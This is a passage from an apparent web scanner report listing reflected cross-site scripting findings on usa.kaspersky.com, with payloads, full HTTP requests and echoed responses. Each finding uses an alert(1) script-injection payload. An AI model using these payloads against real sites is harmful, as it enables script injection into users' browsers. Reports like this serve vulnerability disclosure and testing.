Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387781"
Content-Type: text/html; charset=utf-8
Content-Length: 38038
Date: Sun, 23 Oct 2011 16:36:25 GMT
X-Varnish: 1652567104
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/cssd4d14"><script>alert(1)</script>1573b83a4d3/4d9813e9d0c158247f09dd5a908f5979.css?3" />
...[SNIP]...

1.81. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7280"-alert(1)-"b7b015de7b6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssf7280"-alert(1)-"b7b015de7b6?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387835"
Content-Type: text/html; charset=utf-8
Content-Length: 39440
Date: Sun, 23 Oct 2011 16:37:20 GMT
X-Varnish: 1652569976
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssf7280"-alert(1)-"b7b015de7b6?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.82. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 800d7"><script>alert(1)</script>ef5d161670b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css800d7"><script>alert(1)</script>ef5d161670b?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387820"
Content-Type: text/html; charset=utf-8
Content-Length: 38037
Date: Sun, 23 Oct 2011 16:37:07 GMT
X-Varnish: 1652569260
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css800d7"><script>alert(1)</script>ef5d161670b?3" />
...[SNIP]...

1.83. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf7ac"-alert(1)-"285b88d6f01 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/img/green-bullet-point.jpgcf7ac"-alert(1)-"285b88d6f01 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387745"
Content-Type: text/html; charset=utf-8
Content-Length: 41026
Date: Sun, 23 Oct 2011 16:35:53 GMT
X-Varnish: 1652565593
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpgcf7ac"-alert(1)-"285b88d6f01";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.84. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c0e3"><script>alert(1)</script>df5dba6076a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg7c0e3"><script>alert(1)</script>df5dba6076a HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387713"
Content-Type: text/html; charset=utf-8
Content-Length: 40408
Date: Sun, 23 Oct 2011 16:35:30 GMT
X-Varnish: 1652563502
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg7c0e3"><script>alert(1)</script>df5dba6076a" />
...[SNIP]...

1.85. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6168"-alert(1)-"44c4aeb050b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg?d6168"-alert(1)-"44c4aeb050b=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387641"
Content-Type: text/html; charset=utf-8
Content-Length: 29792
Date: Sun, 23 Oct 2011 16:34:08 GMT
X-Varnish: 1652559027
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
op4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg?d6168"-alert(1)-"44c4aeb050b=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.86. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a258c"><script>alert(1)</script>2a58982bd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/img/green-bullet-point.jpg?a258c"><script>alert(1)</script>2a58982bd91=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:31:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387511"
Content-Type: text/html; charset=utf-8
Content-Length: 29872
Date: Sun, 23 Oct 2011 16:32:14 GMT
X-Varnish: 1652552526
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg?a258c"><script>alert(1)</script>2a58982bd91=1" />
...[SNIP]...

1.87. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9340"-alert(1)-"2434f14f008 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sitese9340"-alert(1)-"2434f14f008/usa.kaspersky.com/files/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:20 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387300"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:28:26 GMT
X-Varnish: 1652542783
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sitese9340"-alert(1)-"2434f14f008/usa.kaspersky.com/files/js_injector_52.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.88. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf5b"><script>alert(1)</script>759f481bd19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites9cf5b"><script>alert(1)</script>759f481bd19/usa.kaspersky.com/files/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:27:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387259"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:27:45 GMT
X-Varnish: 1652540334
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites9cf5b"><script>alert(1)</script>759f481bd19/usa.kaspersky.com/files/js_injector_52.js?3" />
...[SNIP]...

1.89. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3125a"-alert(1)-"38d2c89a96e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com3125a"-alert(1)-"38d2c89a96e/files/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387383"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:29:46 GMT
X-Varnish: 1652547504
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com3125a"-alert(1)-"38d2c89a96e/files/js_injector_52.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.90. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c91b"><script>alert(1)</script>6c1e48cdfe9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com7c91b"><script>alert(1)</script>6c1e48cdfe9/files/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387352"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:29:14 GMT
X-Varnish: 1652545840
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com7c91b"><script>alert(1)</script>6c1e48cdfe9/files/js_injector_52.js?3" />
...[SNIP]...

1.91. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f309"-alert(1)-"413e5b99097 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files4f309"-alert(1)-"413e5b99097/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:31:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387506"
Content-Type: text/html; charset=utf-8
Content-Length: 30903
Date: Sun, 23 Oct 2011 16:33:09 GMT
X-Varnish: 1652552375
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files4f309"-alert(1)-"413e5b99097/js_injector_52.js?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.92. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/js_injector_52.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8019"><script>alert(1)</script>b0d04f8108c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/filesb8019"><script>alert(1)</script>b0d04f8108c/js_injector_52.js?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:30:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387424"
Content-Type: text/html; charset=utf-8
Content-Length: 31000
Date: Sun, 23 Oct 2011 16:30:39 GMT
X-Varnish: 1652549108
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/filesb8019"><script>alert(1)</script>b0d04f8108c/js_injector_52.js?3" />
...[SNIP]...

1.93. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
